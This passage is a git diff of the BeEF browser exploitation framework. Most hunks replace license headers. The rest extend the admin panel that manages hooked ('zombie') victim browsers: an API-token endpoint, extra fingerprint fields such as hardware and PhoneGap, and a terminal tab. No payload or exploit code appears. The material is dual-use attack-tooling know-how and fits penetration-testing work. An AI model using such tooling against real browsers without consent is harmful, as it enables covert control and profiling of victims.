above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + +**************************************************************************** + diff --git a/docs/boilerplate b/docs/boilerplate new file mode 100644 index 000000000..d76a93909 --- /dev/null +++ b/docs/boilerplate @@ -0,0 +1,3 @@ +Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +Browser Exploitation Framework (BeEF) - http://beefproject.com +See the file 'doc/COPYING' for copying permission \ No newline at end of file diff --git a/extensions/admin_ui/api/command.rb b/extensions/admin_ui/api/command.rb index d1257fe64..c18dd991d 100644 --- a/extensions/admin_ui/api/command.rb +++ b/extensions/admin_ui/api/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb index 1f7973e73..e524f4caf 100644 --- a/extensions/admin_ui/api/handler.rb +++ b/extensions/admin_ui/api/handler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -32,12 +22,19 @@ module API # retrieve the configuration class instance configuration = BeEF::Core::Configuration.instance - # registers the http controllers for the AdminUI extensions - Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each { |http_module| + # registers the http controllers used by BeEF core (authentication, logs, modules and panel) + Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module| require http_module mod_name = File.basename http_module, '.rb' beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name)) - } + end + + # registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..) + Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module| + require http_module + mod_name = File.basename http_module, '.rb' + beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name)) + end # mount the folder were we store static files (javascript, css, images) for the admin ui media_dir = File.dirname(__FILE__)+'/../media/' diff --git a/extensions/admin_ui/classes/httpcontroller.rb b/extensions/admin_ui/classes/httpcontroller.rb index 7d6c37965..68948a782 100644 --- a/extensions/admin_ui/classes/httpcontroller.rb +++ b/extensions/admin_ui/classes/httpcontroller.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/classes/session.rb b/extensions/admin_ui/classes/session.rb index 85b16b813..0d6990dc1 100644 --- a/extensions/admin_ui/classes/session.rb +++ b/extensions/admin_ui/classes/session.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/config.yaml b/extensions/admin_ui/config.yaml index dde46ca70..9259abf81 100644 --- a/extensions/admin_ui/config.yaml +++ b/extensions/admin_ui/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/admin_ui/constants/agents.rb b/extensions/admin_ui/constants/agents.rb index 546f0b0f2..cd7d99f88 100644 --- a/extensions/admin_ui/constants/agents.rb +++ b/extensions/admin_ui/constants/agents.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/constants/icons.rb b/extensions/admin_ui/constants/icons.rb index 73afc7fb3..53bc83e79 100644 --- a/extensions/admin_ui/constants/icons.rb +++ b/extensions/admin_ui/constants/icons.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/controllers/authentication/authentication.rb b/extensions/admin_ui/controllers/authentication/authentication.rb index f07a4f94e..78a91e46a 100644 --- a/extensions/admin_ui/controllers/authentication/authentication.rb +++ b/extensions/admin_ui/controllers/authentication/authentication.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/controllers/authentication/index.html b/extensions/admin_ui/controllers/authentication/index.html index 7e0dff715..c2c8e3ef9 100644 --- a/extensions/admin_ui/controllers/authentication/index.html +++ b/extensions/admin_ui/controllers/authentication/index.html @@ -1,3 +1,8 @@ + BeEF Authentication diff --git a/extensions/admin_ui/controllers/logs/logs.rb b/extensions/admin_ui/controllers/logs/logs.rb index 3759ebdec..e384dd620 100644 --- a/extensions/admin_ui/controllers/logs/logs.rb +++ b/extensions/admin_ui/controllers/logs/logs.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index b30573a0d..74643feea 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -28,6 +18,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController def initialize super({ 'paths' => { + '/getRestfulApiToken.json' => method(:get_restful_api_token), '/select/commandmodules/all.json' => method(:select_all_command_modules), '/select/commandmodules/tree.json' => method(:select_command_modules_tree), '/select/commandmodule.json' => method(:select_command_module), @@ -43,6 +34,17 @@ class Modules < BeEF::Extension::AdminUI::HttpController @session = BeEF::Extension::AdminUI::Session.instance end + + # @note Returns the RESTful api key. Authenticated call, so callable only + # from the admin UI after successful authentication (cookie). + # -> http://127.0.0.1:3000/ui/modules/getRestfulApiToken.json + # response + # <- {"token":"800679edbb59976935d7673924caaa9e99f55c32"} + def get_restful_api_token + @body = { + 'token' => BeEF::Core::Configuration.instance.get("beef.api_token") + }.to_json + end # Returns a JSON array containing the summary for a selected zombie. def select_zombie_summary @@ -136,7 +138,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController # set and add the return values for the os name os_name = BD.get(zombie_session, 'OsName') - if not host_name.nil? + if not os_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } @@ -148,6 +150,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + + # set and add the return values for the hardware name + hw_name = BD.get(zombie_session, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end # set and add the return values for the browser name browser_name = BD.get(zombie_session, 'BrowserName') @@ -331,6 +348,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for hasPhonegap + has_phonegap = BD.get(zombie_session, 'hasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(zombie_session, 'HasGoogleGears') if not has_googlegears.nil? @@ -549,12 +581,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController # append the number of command modules so the branch name results in: " (num)" parent.each {|command_module_branch| if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children') - num_of_command_modules = command_module_branch['children'].length - command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" - + num_of_subs = 0 command_module_branch['children'].each {|c| + #add in the submodules and subtract 1 for the folder node + num_of_subs+=c['children'].length-1 if c.has_key?('children') retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder' } + num_of_command_modules = command_module_branch['children'].length + num_of_subs + command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")" + end } end diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html index 31c92c23c..4091f664d 100644 --- a/extensions/admin_ui/controllers/panel/index.html +++ b/extensions/admin_ui/controllers/panel/index.html @@ -1,3 +1,8 @@ + @@ -28,7 +33,12 @@ <%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %> <%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %> - <%= script_tag 'ui/panel/PanelViewer.js' %> + <%= script_tag 'wterm/wterm.jquery.js' %> + <%= stylesheet_tag 'wterm.css' %> + + <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %> + + <%= script_tag 'ui/panel/PanelViewer.js' %> <%= script_tag 'ui/panel/DataGrid.js' %> <%= script_tag 'ui/panel/MainPanel.js' %> <%= script_tag 'ui/panel/ZombieTab.js' %> diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb index f50adb121..e2fe61f07 100644 --- a/extensions/admin_ui/controllers/panel/panel.rb +++ b/extensions/admin_ui/controllers/panel/panel.rb @@ -1,107 +1,118 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF -module Extension -module AdminUI -module Controllers + module Extension + module AdminUI + module Controllers # # # -class Panel < BeEF::Extension::AdminUI::HttpController - - def initialize - super({ - 'paths' => { - '/' => method(:index), - '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update) - } - }) - end - - # default index page - def index; end - - # return a JSON object contains all the updates for the hooked browser trees - def hooked_browser_tree_update - # retrieve the hbs that are online - hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30))) - - # retrieve the hbs that are offline - hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30))) - - # retrieve the distributed engine rules that are enabled - distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true)) - - # hash that gets populated with all the information for the hb trees - ret = { - 'success' => true, - - # the list of hb - 'hooked-browsers' => { - 'online' => hooked_browsers_online, - 'offline' => hooked_browsers_offline - }, - - # the rules for the distributed engine - 'ditributed-engine-rules' => distributed_engine_rules - } - - @body = ret.to_json - end - - # Takes a list distributed engine rules and format the results into JSON - def distributed_engine_rules_2_json_simple(rules) + class Panel < BeEF::Extension::AdminUI::HttpController - end - - # Takes a list of zombies and format the results in a JSON array. - def zombies2json_simple(zombies) - zombies_hash = {} - i = 0 - - zombies.each do |zombie| - # create hash of zombie details - zombies_hash[i] = (get_simple_hooked_browser_hash(zombie)) - i+=1 + def initialize + super({ + 'paths' => { + '/' => method(:index), + '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update) + } + }) + end + + # default index page + def index; + end + + # return a JSON object contains all the updates for the hooked browser trees + def hooked_browser_tree_update + # retrieve the hbs that are online + hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30))) + + # retrieve the hbs that are offline + hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30))) + + # retrieve the distributed engine rules that are enabled + distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true)) + + # hash that gets populated with all the information for the hb trees + ret = { + 'success' => true, + + # the list of hb + 'hooked-browsers' => { + 'online' => hooked_browsers_online, + 'offline' => hooked_browsers_offline + }, + + # the rules for the distributed engine + 'ditributed-engine-rules' => distributed_engine_rules + } + + @body = ret.to_json + end + + # Takes a list distributed engine rules and format the results into JSON + def distributed_engine_rules_2_json_simple(rules) + + end + + # Takes a list of zombies and format the results in a JSON array. + def zombies2json_simple(zombies) + zombies_hash = {} + i = 0 + + zombies.each do |zombie| + # create hash of zombie details + zombies_hash[i] = (get_simple_hooked_browser_hash(zombie)) + i+=1 + end + + zombies_hash + end + + # create a hash of simple hooked browser details + def get_simple_hooked_browser_hash(hooked_browser) + + browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName') + browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion') + browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) + os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) + os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') + hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session) + hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware') + domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') + has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') + has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') + has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears') + has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled') + date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') + + return { + 'session' => hooked_browser.session, + 'ip' => hooked_browser.ip, + 'domain' => domain, + 'port' => hooked_browser.port.to_s, + 'browser_name' => browser_name, + 'browser_version' => browser_version, + 'browser_icon' => browser_icon, + 'os_icon' => os_icon, + 'os_name' => os_name, + 'hw_icon' => hw_icon, + 'hw_name' => hw_name, + 'has_flash' => has_flash, + 'has_web_sockets' => has_web_sockets, + 'has_googlegears' => has_googlegears, + 'has_java' => has_java, + 'date_stamp' => date_stamp + } + + end + end + + end end - - zombies_hash - end - - # create a hash of simple hooked browser details - def get_simple_hooked_browser_hash(hooked_browser) - - browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) - os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) - domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') - - return { - 'session' => hooked_browser.session, - 'ip' => hooked_browser.ip, - 'domain' => domain, - 'port' => hooked_browser.port.to_s, - 'browser_icon' => browser_icon, - 'os_icon' => os_icon - } - end end - -end -end -end -end diff --git a/extensions/admin_ui/extension.rb b/extensions/admin_ui/extension.rb index 041d30d30..1ce500b0e 100644 --- a/extensions/admin_ui/extension.rb +++ b/extensions/admin_ui/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/handlers/ui.rb b/extensions/admin_ui/handlers/ui.rb index 3bfc0da3a..8a375aa52 100644 --- a/extensions/admin_ui/handlers/ui.rb +++ b/extensions/admin_ui/handlers/ui.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Generic Http Handler that extensions can use to register http diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css index ca32174a6..516acd487 100644 --- a/extensions/admin_ui/media/css/base.css +++ b/extensions/admin_ui/media/css/base.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + #header .right-menu { float: right; margin: 10px; diff --git a/extensions/admin_ui/media/css/ext-all.css b/extensions/admin_ui/media/css/ext-all.css index 7e56a6030..230fbd0ae 100644 --- a/extensions/admin_ui/media/css/ext-all.css +++ b/extensions/admin_ui/media/css/ext-all.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + /*! * Ext JS Library 3.3.1 * Copyright(c) 2006-2010 Sencha Inc. diff --git a/extensions/admin_ui/media/css/wterm.css b/extensions/admin_ui/media/css/wterm.css new file mode 100644 index 000000000..45217e860 --- /dev/null +++ b/extensions/admin_ui/media/css/wterm.css @@ -0,0 +1,19 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +/* Basic Terminal CSS */ +.wterm_terminal { background: #000; color: #fff; 